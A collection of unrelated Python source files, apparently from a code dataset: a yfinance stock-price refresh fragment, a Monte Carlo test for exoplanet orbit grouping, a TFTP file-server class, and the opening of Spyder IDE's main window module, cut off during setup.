def refreshStockByTickerAndSuffix(yfStockObject):
try:
time.sleep(randrange(1, 2))
print('Updating for ' + str(yfStockObject))
stock = correctStockMissingOrInvalidFields(yfStockObject.info)
except Exception:
print('YFinance API rejected .info request')
return
stockTicker, stockSuffix = splitTickerAggregate(stock['symbol'])
updateQuery = stockQueries.getRefreshStockQueryForTickerAndSuffix(stockTicker, stockSuffix, stock)
SqlUtility.executeUpdateRequest(updateQuery)
def refreshPriceForStock(stockTicker):
try:
time.sleep(randrange(1, 2))
print('Adjusting price for ' + stockTicker)
refreshRegularPriceForStock(stockTicker)
except Exception:
print('YFinance API rejected download request')
|
test_deconfuser.py | import numpy as np
import multiprocessing
import itertools
import argparse
import os
import deconfuser.sample_planets as sample_planets
import deconfuser.orbit_fitting as orbit_fitting
import deconfuser.orbit_grouping as orbit_grouping
import deconfuser.partition_ranking as partition_ranking
mu_sun = 4*np.pi**2 #Sun's gravitational parameter in AU^3/year^2
parser = argparse.ArgumentParser(description="Monte-Carlo testing of the deconfuser")
parser.add_argument("--n_planets", type=int, default=3, help="number of planet per system (default: 3)")
parser.add_argument("--n_epochs", type=int, default=4, help="number of observation epochs (default: 4)")
parser.add_argument("--cadence", type=float, default=0.5, help="observation candence in years (default: 0.5)")
parser.add_argument("--mu", type=float, default=mu_sun, help="gravitational parameter in AU^3/year^2 (default: 4pi^2)")
parser.add_argument("--min_a", type=float, default=0.25, help="minimum semi-major axis in AU (default: 0.25)")
parser.add_argument("--max_a", type=float, default=2.0, help="maximum semi-major axis in AU (default: 2.0)")
parser.add_argument("--sep_a", type=float, default=0.3, help="minimum semi-major difference in AU (default: 0.3)")
parser.add_argument("--min_i", type=float, default=0, help="minimum inclination in radians (default: 0)")
parser.add_argument("--max_i", type=float, default=np.pi/2, help="maximum inclination in radians (default: pi/2)")
parser.add_argument("--max_e", type=float, default=0.3, help="maximum eccentricity (default: 0.3)")
parser.add_argument("--spread_i_O", type=float, default=0.0, help="spread of inclination and LAN in radians (default: 0.0 - coplanar)")
parser.add_argument("--n_processes", type=int, default=4, help="number of concurrent processes (default: 4)")
parser.add_argument("--n_systems", type=int, default=10, help="number of systems per process (default: 10)")
parser.add_argument("-v", "--verbose", action="store_true", help="print planet data")
parser.add_argument("toleranes", type=float, nargs="+", help="orbit fit tollerances")
args = parser.parse_args()
#observation epochs (years)
ts = args.cadence*np.arange(args.n_epochs)
#the correct partition of detection by planets
correct_partition = [tuple(range(i*len(ts),(i+1)*len(ts))) for i in range(args.n_planets)]
#to speed up computation, begin with coarsest tolerance and progress to finest:
#1. full orbit grouping will be performed with the coarsest tolerance (i.e., recursively consider all groupings of observation)
#2. only "full" groups that fit observation within a coarser tolerance will be fitted with a finer tolerance
#Note: "missed" detections are not simulataed here so confusion will only "arise" with full groups (n_epochs observations per planet)
tolerances = sorted(args.toleranes, reverse=True)
orbit_grouper = orbit_grouping.OrbitGrouper(args.mu, ts, args.min_a-tolerances[0], args.max_a+tolerances[0], args.max_e, tolerances[0], lazy_init=False)
orbit_fitters = [orbit_fitting.OrbitFitter(args.mu, ts, args.min_a-tol, args.max_a+tol, args.max_e, tol) for tol in tolerances[1:]]
#multi-process printing
printing_lock = multiprocessing.Lock()
def _print(*v):
printing_lock.acquire()
print(os.getpid(), *v)
os.sys.stdout.flush()
printing_lock.release()
#main function to be ran from multiple processors (the large lookup tables are read-only and shared between processes)
def generate_and_test_systems():
np.random.seed(os.getpid())
for _ in range(args.n_systems):
#choose random orbit parameters for each planet
a,e,i,o,O,M0 = sample_planets.random_planet_elements(args.n_planets, args.min_a, args.max_a, args.max_e, args.sep_a, args.min_i, args.max_i, args.spread_i_O)
#get coordinates of planets when observed
xs,ys = sample_planets.get_observations(a, e, i, o, O, M0, ts, args.mu)
observations = np.stack([xs,ys], axis=2).reshape((-1,2))
#add radially bounded astrometry error
noise_r = tolerances[-1]*np.random.random(len(observations))
noise_a = 2*np.pi*np.random.random(len(observations))
observations[:,0] += noise_r*np.cos(noise_a)
observations[:,1] += noise_r*np.sin(noise_a)
if args.verbose:
_print("ts =", list(ts))
for ip in range(args.n_planets):
_print("a,e,i,o,O,M0 = ", (a[ip],e[ip],i[ip],o[ip],O[ip],M0[ip]))
_print("xys =", list(map(list, observations[ip*len(ts):(ip+1)*len(ts)])))
#all detection times for all obesrvations
all_ts = np.tile(ts, args.n_planets)
#get all possible (full or patrial) groupings of detection by orbits that fit them with the coarsest tolerance
groupings = orbit_grouper.group_orbits(observations, all_ts)
#select only groupings that include all epochs (these will be most highly ranked, so no need to check the rest)
groupings = [g for g in groupings if len(g) == args.n_epochs]
#check for spurious orbits and repeat for finer tolerances
for j in range(len(tolerances)):
found_correct = sum(cg in groupings for cg in correct_partition)
_print("Tolerance %f: found %d correct and %d spurious orbits out of %d"%(tolerances[j], found_correct, len(groupings) - found_correct, args.n_planets))
if args.verbose:
_print("Tolerance %f:"%(tolerances[j]), groupings)
#find all partitions of observations to exactly n_planets groups
#note that since all partial grouping were filtered out, all partitions will have exactly n_planets groups
top_partitions = list(partition_ranking.get_ranked_partitions(groupings))
if found_correct < args.n_planets:
for ip in range(args.n_planets):
if not correct_partition[ip] in groupings:
_print("Failed to fit a correct orbit for planet %d!"%(ip))
elif len(top_partitions) == 1:
_print("Tolerance %f: no confusion"%(tolerances[j]))
else:
assert(len(top_partitions) > 1)
_print("Tolerance %f: found %d spurious \"good\" paritions of detections by planets (confusion)"%(tolerances[j], len(top_partitions) - 1))
if args.verbose:
_print("Tolerance %f:"%(tolerances[j]), top_partitions)
#move to a finer tolerance
if j < len(tolerances) - 1:
#only keep groupings that cna be fitted with an orbit with the finer tolerance
groupings = [g for g in groupings if any(err < tolerances[j+1] for err in orbit_fitters[j].fit(observations[list(g)], only_error=True))]
#run testing from multiple processes
processes = []
for i in range(args.n_processes):
p = multiprocessing.Process(target=generate_and_test_systems)
p.start()
processes.append(p)
#wait for all processes to finish
for p in processes:
p.join()
|
tftp.py | import logging
import os
import random
import signal
import tempfile
import threading
from pyats.utils.sig_handlers import enable_double_ctrl_c
from tftpy import TftpClient, TftpServer
from ..server import FileServer as BaseFileServer
from ..server import ALPHA
DEFAULT_PORT = 0
class FileServer(BaseFileServer):
'''FileServer for tftp protocol
Starts a TFTP server in another process and returns address information
'''
protocol = 'tftp'
def run_server(self):
# Run server in separate process
signal.signal(signal.SIGINT, lambda x, y: None)
address = self.server_info['address']
port = self.server_info.get('port', DEFAULT_PORT)
self.path = self.server_info.setdefault('path', '/')
server = TftpServer(self.path)
logfile = self.server_info.get('logfile', None)
if logfile:
ftp_logger = logging.getLogger('tftpy')
ftp_logger.setLevel(logging.DEBUG)
ftp_logger.propagate = False
ftp_handler = logging.FileHandler(logfile)
ftp_logger.addHandler(ftp_handler)
# Port is only allocated after server is running, so start a thread
# to retrieve
threading.Thread(target=self.get_port, args=(server,)).start()
server.listen(address, port)
def verify_server(self):
ip = self.server_info['address']
port = self.server_info['port']
path = self.server_info['path']
# Set up client logging
logfile = self.server_info.get('logfile', None)
if logfile:
logfile = '%s.client%s' % os.path.splitext(logfile)
ftp_logger = logging.getLogger('tftpy')
ftp_logger.setLevel(logging.DEBUG)
ftp_logger.propagate = False
ftp_handler = logging.FileHandler(logfile)
ftp_logger.addHandler(ftp_handler)
# Create a temporary file to copy to the TFTP server
with tempfile.TemporaryDirectory() as tmpdir:
# Create a file that will not conflict with any existing files
filename = self._generate_filename()
filepath = os.path.join(tmpdir, filename)
with open(filepath, 'w') as f:
f.write('ab'*100)
# can't write to root. Use tmpdir instead
if path == '/':
filename = os.path.join(tmpdir, '%s2' % filename)
client = TftpClient(ip, port)
client.upload(filename, filepath)
# Confirm file was copied
upfilepath = os.path.join(path, filename)
if not os.path.isfile(upfilepath):
raise OSError('TFTP Upload unsuccessful')
os.remove(upfilepath)
def get_port(self, server):
# Threaded function to get the allocated port for the TFTP server
server.is_running.wait(5)
self.queue.put({'port': server.listenport, 'path': self.path})
def _generate_filename(self):
path = self.server_info['path']
for i in range(5):
filename = ''.join([random.choice(ALPHA) for x in range(10)])
filepath = '%s/%s' % (path, filename)
if not os.path.exists(filepath):
return filename
raise OSError('Could not find filename not already in %s' % path)
|
mainwindow.py | # -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific PYthon Development EnviRonment
=====================================================
Developped and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
import atexit
import errno
import gc
import os
import os.path as osp
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import traceback
#==============================================================================
# Keeping a reference to the original sys.exit before patching it
#==============================================================================
ORIGINAL_SYS_EXIT = sys.exit
#==============================================================================
# Check requirements
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Windows only: support for hiding console window when started with python.exe
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Workaround: importing rope.base.project here, otherwise this module can't
# be imported if Spyder was executed from another folder than spyder
#==============================================================================
try:
import rope.base.project # analysis:ignore
except ImportError:
pass
#==============================================================================
# Qt imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot)
from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence, QPixmap
from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow,
QMenu, QMessageBox, QShortcut, QSplashScreen,
QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
# To catch font errors in QtAwesome
from qtawesome.iconic_font import FontError
#==============================================================================
# Proper high DPI scaling is available in Qt >= 5.6.0. This attibute must
# be set before creating the application.
#==============================================================================
from spyder.config.main import CONF
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling, CONF.get('main', 'high_dpi_scaling'))
#==============================================================================
# Create our QApplication instance here because it's needed to render the
# splash screen created below
#==============================================================================
from spyder.utils.qthelpers import qapplication, MENU_SEPARATOR
from spyder.config.base import get_image_path
MAIN_APP = qapplication()
if PYQT5:
APP_ICON = QIcon(get_image_path("spyder.svg"))
else:
APP_ICON = QIcon(get_image_path("spyder.png"))
MAIN_APP.setWindowIcon(APP_ICON)
#==============================================================================
# Create splash screen out of MainWindow to reduce perceived startup time.
#==============================================================================
from spyder.config.base import _, get_image_path, DEV, running_under_pytest
if not running_under_pytest():
SPLASH = QSplashScreen(QPixmap(get_image_path('splash.svg')))
SPLASH_FONT = SPLASH.font()
SPLASH_FONT.setPixelSize(10)
SPLASH.setFont(SPLASH_FONT)
SPLASH.show()
SPLASH.showMessage(_("Initializing..."), Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.white))
QApplication.processEvents()
else:
SPLASH = None
#==============================================================================
# Local utility imports
#==============================================================================
from spyder import (__version__, __project_url__, __forum_url__,
__trouble_url__, __trouble_url_short__, get_versions)
from spyder.config.base import (get_conf_path, get_module_source_path, STDERR,
DEBUG, debug_print, MAC_APP_NAME, get_home_dir,
running_in_mac_app, get_module_path,
reset_config_files)
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.app.cli_options import get_options
from spyder import dependencies
from spyder.py3compat import (is_text_string, to_text_string,
PY3, qbytearray_to_str, configparser as cp)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.introspection import module_completion
from spyder.utils.programs import is_module_installed
from spyder.utils.misc import select_port, getcwd_or_home, get_python_executable
from spyder.widgets.fileswitcher import FileSwitcher
#==============================================================================
# Local gui imports
#==============================================================================
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
try:
from spyder.utils.environ import WinUserEnvDialog
except ImportError:
WinUserEnvDialog = None # analysis:ignore
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri)
from spyder.config.gui import get_shortcut
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
#==============================================================================
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
#==============================================================================
CWD = getcwd_or_home()
#==============================================================================
# Spyder's main window widgets utilities
#==============================================================================
def get_python_doc_path():
"""
Return Python documentation path
(Windows: return the PythonXX.chm path if available)
"""
if os.name == 'nt':
doc_path = osp.join(sys.prefix, "Doc")
if not osp.isdir(doc_path):
return
python_chm = [path for path in os.listdir(doc_path)
if re.match(r"(?i)Python[0-9]{3,6}.chm", path)]
if python_chm:
return file_uri(osp.join(doc_path, python_chm[0]))
else:
vinf = sys.version_info
doc_path = '/usr/share/doc/python%d.%d/html' % (vinf[0], vinf[1])
python_doc = osp.join(doc_path, "index.html")
if osp.isfile(python_doc):
return file_uri(python_doc)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks
CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
BOOKMARKS = (
('Python2', "https://docs.python.org/2/index.html",
_("Python2 documentation")),
('Python3', "https://docs.python.org/3/index.html",
_("Python3 documentation")),
('numpy', "http://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "http://matplotlib.sourceforge.net/contents.html",
_("Matplotlib documentation")),
('PyQt5',
"http://pyqt.sourceforge.net/Docs/PyQt5/",
_("PyQt5 Reference Guide")),
('PyQt5',
"http://pyqt.sourceforge.net/Docs/PyQt5/class_reference.html",
_("PyQt5 API Reference")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
all_actions_defined = Signal()
sig_pythonpath_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # related to interactive tour
sig_moved = Signal("QMoveEvent") # related to interactive tour
def __init__(self, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
self.open_project = options.open_project
self.window_title = options.window_title
self.debug_print("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Create our TEMPDIR
if not osp.isdir(programs.TEMPDIR):
os.mkdir(programs.TEMPDIR)
# Shortcut management data
self.shortcut_data = []
# Loading Spyder path
self.path = []
self.not_active_path = []
self.project_path = []
if osp.isfile(self.SPYDER_PATH):
self.path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = [name for name in self.path if osp.isdir(name)]
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
self.not_active_path, _x = \
encoding.readlines(self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = \
[name for name in self.not_active_path if osp.isdir(name)]
self.remove_path_from_sys_path()
self.add_path_to_sys_path()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.ipyconsole = None
self.variableexplorer = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
# File switcher
self.fileswitcher = None
# Check for updates Thread and Worker, refereces needed to prevent
# segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.plugins.configdialog import (MainConfigPage,
ColorSchemeConfigPage)
from spyder.plugins.shortcuts import ShortcutsConfigPage
from spyder.plugins.runconfig import RunConfigPage
from spyder.plugins.maininterpreter import MainInterpreterConfigPage
self.general_prefs = [MainConfigPage, ShortcutsConfigPage,
ColorSchemeConfigPage, MainInterpreterConfigPage,
RunConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
# Quick Layouts and Dialogs
from spyder.plugins.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_dockwidgets_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.mem_status = None
self.cpu_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
# Set window title
self.set_window_title()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
debug_print("appusermodelid: " + str(res))
# Setting QTimer if running in travis
test_travis = os.environ.get('TEST_CI_APP', None)
if test_travis is not None:
global MAIN_APP
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(MAIN_APP.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = SPLASH
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.dockwidgets_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
# The following flag remember the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See issue 4132
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError as e:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: #555555\'><b>netsh winsock reset"
"</b></span><br>"))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
self.apply_settings()
self.debug_print("End of MainWindow constructor")
def debug_print(self, message):
"""Debug prints"""
debug_print(message)
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
def setup(self):
"""Setup main window"""
self.debug_print("*** Start of MainWindow setup ***")
self.debug_print(" ..core actions")
self.close_dockwidget_action = create_action(self,
icon=ima.icon('DialogCloseButton'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_dockwidgets_action = create_action(self, _("Lock panes"),
toggled=self.toggle_lock_dockwidgets,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_dockwidgets_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
# File switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_fileswitcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_sc_to_tip=True)
self.file_toolbar_actions = [self.file_switcher_action,
self.symbol_finder_action]
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
namespace = None
self.debug_print(" ..toolbars")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
self.projects_menu.aboutToShow.connect(self.valid_project)
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
self.debug_print(" ..tools")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
triggered=self.edit_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_sc_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.path_manager_callback,
tip=_("Python Path Manager"),
menurole=QAction.ApplicationSpecificRole)
update_modules_action = create_action(self,
_("Update module names list"),
triggered=lambda:
module_completion.reset(),
tip=_("Refresh list of module names "
"available in PYTHONPATH"))
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
self.tools_menu_actions += [reset_spyder_action, MENU_SEPARATOR,
update_modules_action]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"),
name, 'qtdesigner.png')
if qtdact:
break
for name in ("linguist-qt4", "linguist"):
qtlact = create_program_action(self, _("Qt Linguist"),
"linguist", 'qtlinguist.png')
if qtlact:
break
args = ['-no-opengl'] if os.name == 'nt' else []
for act in (qtdact, qtlact):
if act:
additact.append(act)
if additact and is_module_installed('winpython'):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
self.debug_print(" ..sift?")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see issue 2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
except:
pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
except:
pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# ViTables
vitables_act = create_program_action(self, _("ViTables"),
"vitables", 'vitables.png')
if vitables_act:
self.external_tools_menu_actions += [None, vitables_act]
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.fullscreen_action, "_",
"Fullscreen mode", add_sc_to_tip=True)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Internal console plugin
self.debug_print(" ..plugin: internal console")
from spyder.plugins.console import Console
self.console = Console(self, namespace, exitfunc=self.closing,
profile=self.profile,
multithreaded=self.multithreaded,
message=_("Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"))
self.console.register_plugin()
# Working directory plugin
self.debug_print(" ..plugin: working directory")
from spyder.plugins.workingdirectory import WorkingDirectory
self.workingdirectory = WorkingDirectory(self, self.init_workdir, main=self)
self.workingdirectory.register_plugin()
